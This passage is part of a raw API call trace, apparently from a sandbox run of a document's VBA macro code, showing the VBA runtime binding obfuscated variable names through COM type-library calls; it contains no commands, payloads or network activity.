pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.193] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.193] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.193] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.193] IUnknown:Release (This=0x665ba50) returned 0xd [0069.193] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.194] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.194] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.194] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.194] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.194] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.194] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.194] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.194] IUnknown:Release (This=0x665ba50) returned 0xd [0069.194] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.194] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.194] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.194] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.194] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.194] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.194] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.194] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.194] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.194] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.194] IUnknown:Release (This=0x665ba50) returned 0xd [0069.194] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.194] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.194] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.195] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.195] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.195] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.195] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.195] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.195] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.195] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.195] IUnknown:Release (This=0x665ba50) returned 0xd [0069.195] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.195] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.195] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a36, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jUDCwCA") returned 8 [0069.195] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jUDCwCA", lHashVal=0x10311d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a36, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jUDCwCA") returned 8 [0069.195] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jUDCwCA", lHashVal=0x10311d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a36, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jUDCwCA") returned 8 [0069.195] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jUDCwCA", lHashVal=0x10311d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.195] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jUDCwCA") returned 0x10311d [0069.195] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jUDCwCA" | out: _Dst="jUDCwCA") returned 0x0 [0069.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jUDCwCA") returned 8 [0069.195] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.196] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jUDCwCA", lHashVal=0x10311d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.196] IUnknown:Release (This=0x665ba50) returned 0xd [0069.196] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.196] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jUDCwCA", lHashVal=0x10311d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.196] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.196] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.196] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jUDCwCA", lHashVal=0x10311d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.196] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.196] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.196] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jUDCwCA", lHashVal=0x10311d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.196] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62a36, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jUDCwCA") returned 8 [0069.196] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jUDCwCA", lHashVal=0x10311d, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.196] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.196] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62a36 | out: _Dst=0x67c2d40) returned 0x0 [0069.196] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jUDCwCA") returned 0x1034a1 [0069.196] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jUDCwCA" | out: _Dst="_B_var_jUDCwCA") returned 0x0 [0069.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jUDCwCA") returned 15 [0069.196] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.196] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jUDCwCA", lHashVal=0x1034a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.196] IUnknown:Release (This=0x665ba50) returned 0xd [0069.196] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.196] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jUDCwCA", lHashVal=0x1034a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.196] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.196] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.196] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jUDCwCA", lHashVal=0x1034a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.196] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.196] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.197] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jUDCwCA", lHashVal=0x1034a1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.197] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.197] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.197] IUnknown:Release (This=0x665ba50) returned 0xd [0069.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1190e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jUDCwCA") returned 15 [0069.197] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jUDCwCA", lHashVal=0x1034a1, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x77004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x77004300000000, pDummy=0x0) returned 0x0 [0069.197] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62a36 | out: _Dst=0x144ec0) returned 0x0 [0069.197] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jABQA1w", lHashVal=0x10a456, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b32, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jABQA1w") returned 8 [0069.197] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jABQA1w", lHashVal=0x10a456, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b32, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jABQA1w") returned 8 [0069.197] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jABQA1w", lHashVal=0x10a456, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.197] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jABQA1w") returned 0x10a456 [0069.197] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jABQA1w" | out: _Dst="jABQA1w") returned 0x0 [0069.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jABQA1w") returned 8 [0069.197] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.197] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jABQA1w", lHashVal=0x10a456, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.197] IUnknown:Release (This=0x665ba50) returned 0xd [0069.197] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.197] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jABQA1w", lHashVal=0x10a456, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.198] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.198] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.198] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jABQA1w", lHashVal=0x10a456, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.198] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.198] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.198] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jABQA1w", lHashVal=0x10a456, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.198] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b32, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jABQA1w") returned 8 [0069.198] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jABQA1w", lHashVal=0x10a456, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.198] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.198] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62b32 | out: _Dst=0x67c2d40) returned 0x0 [0069.198] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jABQA1w") returned 0x10a7da [0069.198] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jABQA1w" | out: _Dst="_B_var_jABQA1w") returned 0x0 [0069.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jABQA1w") returned 15 [0069.198] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.198] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jABQA1w", lHashVal=0x10a7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.198] IUnknown:Release (This=0x665ba50) returned 0xd [0069.198] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.198] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jABQA1w", lHashVal=0x10a7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.198] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.198] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.198] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jABQA1w", lHashVal=0x10a7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.198] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.198] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.198] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jABQA1w", lHashVal=0x10a7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.198] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.198] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.198] IUnknown:Release (This=0x665ba50) returned 0xd [0069.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1193e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jABQA1w") returned 15 [0069.199] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jABQA1w", lHashVal=0x10a7da, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.199] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62b32 | out: _Dst=0x144ec0) returned 0x0 [0069.199] ITypeComp:RemoteBind (in: This=0x665ba60, szName="TAAAQADA", lHashVal=0x10cd92, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b06, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TAAAQADA") returned 9 [0069.199] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="TAAAQADA", lHashVal=0x10cd92, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b06, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TAAAQADA") returned 9 [0069.199] ITypeComp:RemoteBind (in: This=0x665bd30, szName="TAAAQADA", lHashVal=0x10cd92, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.199] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TAAAQADA") returned 0x10cd92 [0069.199] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="TAAAQADA" | out: _Dst="TAAAQADA") returned 0x0 [0069.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="TAAAQADA") returned 9 [0069.199] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.199] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="TAAAQADA", lHashVal=0x10cd92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.199] IUnknown:Release (This=0x665ba50) returned 0xd [0069.199] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.199] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="TAAAQADA", lHashVal=0x10cd92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.199] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.199] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.199] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="TAAAQADA", lHashVal=0x10cd92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.199] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.199] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.199] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="TAAAQADA", lHashVal=0x10cd92, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.199] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b06, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TAAAQADA") returned 9 [0069.199] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="TAAAQADA", lHashVal=0x10cd92, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.200] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.200] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62b06 | out: _Dst=0x67c2d40) returned 0x0 [0069.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_TAAAQADA") returned 0x10a51b [0069.200] strcpy_s (in: 